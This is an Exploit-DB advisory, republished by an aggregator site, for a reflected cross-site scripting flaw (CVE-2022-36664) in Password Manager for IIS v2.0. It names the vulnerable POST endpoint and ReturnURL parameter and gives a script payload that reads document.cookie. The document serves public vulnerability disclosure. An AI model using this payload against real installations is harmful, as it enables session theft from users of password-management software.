[webapps] Password Manager for IIS v2.0 - XSS
2023-3-25 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏
2023-3-25 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏
# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
# Version: *Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664
Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1
Affected Parameter in http
payload:*ReturnURL*=<script>alert(document.cookie)</script>
*Cordially,*
文章来源: https://www.exploit-db.com/exploits/51055
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh